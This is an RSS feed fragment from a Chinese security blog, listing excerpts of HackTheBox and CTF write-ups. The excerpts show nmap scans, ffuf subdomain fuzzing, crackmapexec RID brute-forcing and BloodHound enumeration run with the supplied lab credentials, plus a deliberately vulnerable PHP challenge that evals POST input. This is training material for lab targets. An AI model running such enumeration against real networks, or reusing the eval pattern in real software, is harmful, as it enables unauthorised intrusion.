          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap Chemistry.htb -sS -Pn -T4 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 20:11 CST
Nmap scan report for Chemistry.htb (10.10.11.38)
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;5000&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Heal</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-heal/</link>
      <pubDate>Sun, 15 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-heal/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Heal  
❯ nmap -sSCV -Pn heal.htb           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 17:29 CST
Nmap scan report for heal.htb (10.10.11.46)
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_  256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Heal
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.40 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sherlocks-Brutus</title>
      <link>https://www.hyhforever.top/posts/2024/12/sherlocks-brutus/</link>
      <pubDate>Tue, 10 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/sherlocks-brutus/</guid>
      <description>&lt;h2 id=&#34;sherlock-scenario&#34;&gt;Sherlock Scenario&lt;/h2&gt;
&lt;p&gt;在这个非常简单的 Sherlock 中，您将熟悉 Unix auth.log 和 wtmp 日志。我们将探索一个场景，其中 Confluence 服务器通过其 SSH 服务被暴力破解。获得对服务器的访问权限后，攻击者执行了其他活动，我们可以使用 auth.log 进行跟踪。尽管 auth.log 主要用于暴力分析，但我们将在调查中深入研究此工件的全部潜力，包括权限提升、持久性方面，甚至对命令执行的一些可见性。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-LinkVortex</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-linkvortex/</link>
      <pubDate>Mon, 09 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-linkvortex/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap -sSCV -Pn LinkVortex.htb 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 21:44 CST
Nmap scan report for LinkVortex.htb (10.10.11.47)
Host is up (0.088s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
| http-title: BitByBit Hardware
|_Requested resource was http://linkvortex.htb/
| http-robots.txt: 4 disallowed entries 
|_/ghost/ /p/ /email/ /r/
|_http-generator: Ghost 5.58
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;subdomain-fuzz&#34;&gt;Subdomain Fuzz&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/LinkVortex  
❯ ffuf -u http://linkvortex.htb/ -w ./fuzzDicts/subdomainDicts/main.txt -H &amp;#34;Host:FUZZ.linkvortex.htb&amp;#34;  -mc 200            ⏎

        /&amp;#39;___\  /&amp;#39;___\           /&amp;#39;___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://linkvortex.htb/
 :: Wordlist         : FUZZ: /home/kali/LinkVortex/fuzzDicts/subdomainDicts/main.txt
 :: Header           : Host: FUZZ.linkvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 73ms]
:: Progress: [167378/167378] :: Job [1/1] :: 500 req/sec :: Duration: [0:05:55] :: Errors: 46 ::
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;发现存在：&lt;code&gt;dev.linkvortex.htb&lt;/code&gt;，添加到&lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Certified</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-certified/</link>
      <pubDate>Sun, 08 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-certified/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: &lt;code&gt;judith.mader&lt;/code&gt; Password: &lt;code&gt;judith09&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;┌──(root㉿kali)-[/home/kali/Certified]
└─# nmap -sSCV -Pn -p- Certified.htb     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-06 20:00 CST
Stats: 0:02:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.13% done; ETC: 20:02 (0:00:15 remaining)
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.90% done; ETC: 20:04 (0:00:25 remaining)
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.90% done; ETC: 20:04 (0:00:25 remaining)
Nmap scan report for Certified.htb (10.10.11.41)
Host is up (0.083s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-06 18:49:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
49772/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-06T18:49:56
|_  start_date: N/A
|_clock-skew: mean: 6h45m58s, deviation: 0s, median: 6h45m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.91 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;getallusername&#34;&gt;GetAllUserName&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;┌──(root㉿kali)-[~kali/Certified]
└─# crackmapexec smb certified.htb -u &amp;#34;judith.mader&amp;#34; -p &amp;#34;judith09&amp;#34; --rid-brute | grep SidTypeUser
SMB  Certified.htb   445    DC01      500: CERTIFIED\Administrator (SidTypeUser)
SMB  Certified.htb   445    DC01      501: CERTIFIED\Guest (SidTypeUser)
SMB  Certified.htb   445    DC01      502: CERTIFIED\krbtgt (SidTypeUser)
SMB  Certified.htb   445    DC01      1000: CERTIFIED\DC01$ (SidTypeUser)
SMB  Certified.htb   445    DC01      1103: CERTIFIED\judith.mader (SidTypeUser)
SMB  Certified.htb   445    DC01      1105: CERTIFIED\management_svc(SidTypeUser)
SMB  Certified.htb   445    DC01      1106: CERTIFIED\ca_operator (SidTypeUser)
SMB  Certified.htb   445    DC01      1601: CERTIFIED\alexander.huges (SidTypeUser)
SMB  Certified.htb   445    DC01      1602: CERTIFIED\harry.wilson (SidTypeUser)
SMB  Certified.htb   445    DC01      1603: CERTIFIED\gregory.cameron (SidTypeUser)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;bloodhound&#34;&gt;Bloodhound&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;┌──(root㉿kali)-[~kali/Certified]
└─# bloodhound-python -u judith.mader -p &amp;#39;judith09&amp;#39; -c All -d certified.htb -ns 10.10.11.41       
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 17S
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;导入到bloodhoundGUI里面进行分析&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Administrator</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-administrator/</link>
      <pubDate>Thu, 05 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-administrator/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: &lt;code&gt;Olivia&lt;/code&gt; Password: &lt;code&gt;ichliebedich&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;┌──(root㉿kali)-[/home/kali/Administrator]
└─# nmap -sSCV -Pn administrator.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 15:51 CST
Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.072s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-05 14:37:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h46m00s
| smb2-time: 
|   date: 2024-12-05T14:37:51
|_  start_date: N/A
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;crackmapexec&#34;&gt;Crackmapexec&lt;/h2&gt;
&lt;p&gt;通过SMB服务，获取到了当前存在的用户信息&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Vintage</title>
      <link>https://www.hyhforever.top/posts/2024/12/hackthebox-vintage/</link>
      <pubDate>Tue, 03 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/hackthebox-vintage/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: &lt;code&gt;P.Rosa&lt;/code&gt; / &lt;code&gt;Rosaisbest123&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;└─# nmap  -sC -sV -T4 -Pn  vintage.htb -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-04 01:49:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49681/tcp open  unknown
50907/tcp open  unknown
65103/tcp open  unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -13m55s
| smb2-time: 
|   date: 2024-12-04T01:49:48
|_  start_date: N/A
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;发现在3269端口这一行，存在一个名为：DC01 的域控主机，添加到/etc/hosts中&lt;/p&gt;</description>
    </item>
    <item>
      <title>WuCup-2024</title>
      <link>https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/</link>
      <pubDate>Sun, 01 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/</guid>
      <description>&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h3 id=&#34;sign&#34;&gt;Sign&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;题目介绍:&lt;/strong&gt; POST浅浅签个到吧&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;hellohacker&#34;&gt;HelloHacker&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;题目介绍:&lt;/strong&gt; 你看到的不一定是真的&lt;/p&gt;
&lt;p&gt;源码如下&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php
highlight_file(__FILE__);
error_reporting(0);
include_once &amp;#39;check.php&amp;#39;;
include_once &amp;#39;ban.php&amp;#39;;

$incompetent = $_POST[&amp;#39;incompetent&amp;#39;];
$WuCup = $_POST[&amp;#39;WuCup&amp;#39;];

if ($incompetent !== &amp;#39;HelloHacker&amp;#39;) {
    die(&amp;#39;Come invade!&amp;#39;);
}

$required_chars = [&amp;#39;p&amp;#39;, &amp;#39;e&amp;#39;, &amp;#39;v&amp;#39;, &amp;#39;a&amp;#39;, &amp;#39;n&amp;#39;, &amp;#39;x&amp;#39;, &amp;#39;r&amp;#39;, &amp;#39;o&amp;#39;, &amp;#39;z&amp;#39;];
$is_valid = true;

if (!checkRequiredChars($WuCup, $required_chars)) {
    $is_valid = false;
}

if ($is_valid) {

    $prohibited_file = &amp;#39;prohibited.txt&amp;#39;;
    if (file_exists($prohibited_file)) {
        $file = fopen($prohibited_file, &amp;#39;r&amp;#39;);
        
while ($line = fgets($file)) {
    $line = rtrim($line, &amp;#34;\r\n&amp;#34;);  
    if ($line === &amp;#39;&amp;#39; &amp;amp;&amp;amp; strpos($WuCup, &amp;#39; &amp;#39;) === false) {
      
        continue;
    }
    if (stripos($WuCup, $line) !== false) {
        fclose($file);  
        die(&amp;#39;this road is blocked&amp;#39;);
    }
}
  fclose($file);  
    }

    eval($WuCup);
} else {
    die(&amp;#39;NO！NO！NO！&amp;#39;);
}

?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;简单分析一下，post的参数中&lt;code&gt;incompetent&lt;/code&gt;是&lt;code&gt;HelloHacker&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Alert</title>
      <link>https://www.hyhforever.top/posts/2024/11/htb-alert/</link>
      <pubDate>Sat, 30 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/htb-alert/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-scan&#34;&gt;Nmap Scan&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;nmap alert.htb -sC -sV -T4 -Pn
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/htb-alert/images/image-129.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/htb-alert/images/image-129.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;开放端口：22、80，httpserver是Apache&lt;/p&gt;
&lt;p&gt;进入80端口的网页，发现存在Markdown文件上传&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/htb-alert/images/image-130.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/htb-alert/images/image-130.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Cap</title>
      <link>https://www.hyhforever.top/posts/2024/11/hackthebox-cap/</link>
      <pubDate>Sun, 24 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/hackthebox-cap/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;usertxt&#34;&gt;User.txt&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/hackthebox-cap/images/image-101.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/hackthebox-cap/images/image-101.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;进入网页，点击&lt;code&gt;Security Snapshot&lt;/code&gt;，可以看到url进入到了&lt;code&gt;/data/4&lt;/code&gt;，下面存在download路由，将其下载下来，并没有任何东西&lt;/p&gt;</description>
    </item>
    <item>
      <title>SWPUCTF2023-Pwn</title>
      <link>https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/</link>
      <pubDate>Sun, 24 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;之前学习过一段时间Pwn，后面就丢掉了，再重新回来补一补&lt;/p&gt;
&lt;h2 id=&#34;签到&#34;&gt;签到&lt;/h2&gt;
&lt;p&gt;checksec检查一下&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/images/image-107.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/images/image-107.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;用64位IDA打开&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/images/image-108.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/swpuctf2023-pwn/images/image-108.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;简单的栈溢出，backdoor的位置直接给了&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF-2023-Reverse</title>
      <link>https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/</link>
      <pubDate>Sat, 23 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/</guid>
      <description>&lt;h2 id=&#34;世界上最棒的程序员&#34;&gt;世界上最棒的程序员&lt;/h2&gt;
&lt;p&gt;Shift+F12，在全局字符串中查找到flag&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/images/image-76.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/images/image-76.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;ez_xor&#34;&gt;ez_XOR&lt;/h2&gt;
&lt;p&gt;使用32位IDA打开，F5查看伪代码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/11/litctf-2023-reverse/images/image-74.png&#34; data-caption=&#34;&#34;&gt;
